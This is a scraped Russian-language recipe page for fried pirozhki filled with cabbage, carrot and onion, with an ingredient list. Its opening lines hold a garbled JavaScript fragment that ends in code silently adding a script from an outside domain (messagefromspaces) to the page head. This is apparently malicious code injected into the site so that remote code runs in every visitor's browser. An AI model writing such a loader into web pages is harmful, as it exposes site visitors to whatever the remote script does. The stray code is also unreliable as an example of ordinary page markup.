Жареные пирожки , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Жареные пирожки

Для жареных пирожков можно приготовить начинку из моркови и свежей капусты. Для начинки нужно нарубить мелко небольшой качан капусты. Затем натереть на терке морковь. Нарезать мелко луковицу. Все ингредиенты поместить в сковороду, затем добавить растительного масла и жарить на огне ниже среднего часто помешивая до готовности. Готовую начинку выложить до остывания в удобное блюдо. Обычное кислое тесто раскатать тонким слоем, вырезать кружки круглой выемкой, на каждый кружок положить ложку начинки. Соединить края теста, защипать, чтобы форма пирожка получилась продолговатой. Пирожки выложить на основу (доску) и оставить их подниматься в теплом месте. Жарить пирожки нужно на сковородке на подсолнечном масле, переворачивая их с одной стороны на другую. Жареные пирожки должны при жарке подрумяниться.
________________________________________________________________________________________________________

Ингредиенты для рецепта жареных пирожков

1. капуста 1 качан
2. морковь 1 шт
3. луковица 1 шт
4. мука 1 кг
5. дрожжи 20-25 гр
6. сахар
7. соль

Другие рецепты:

Comments are closed.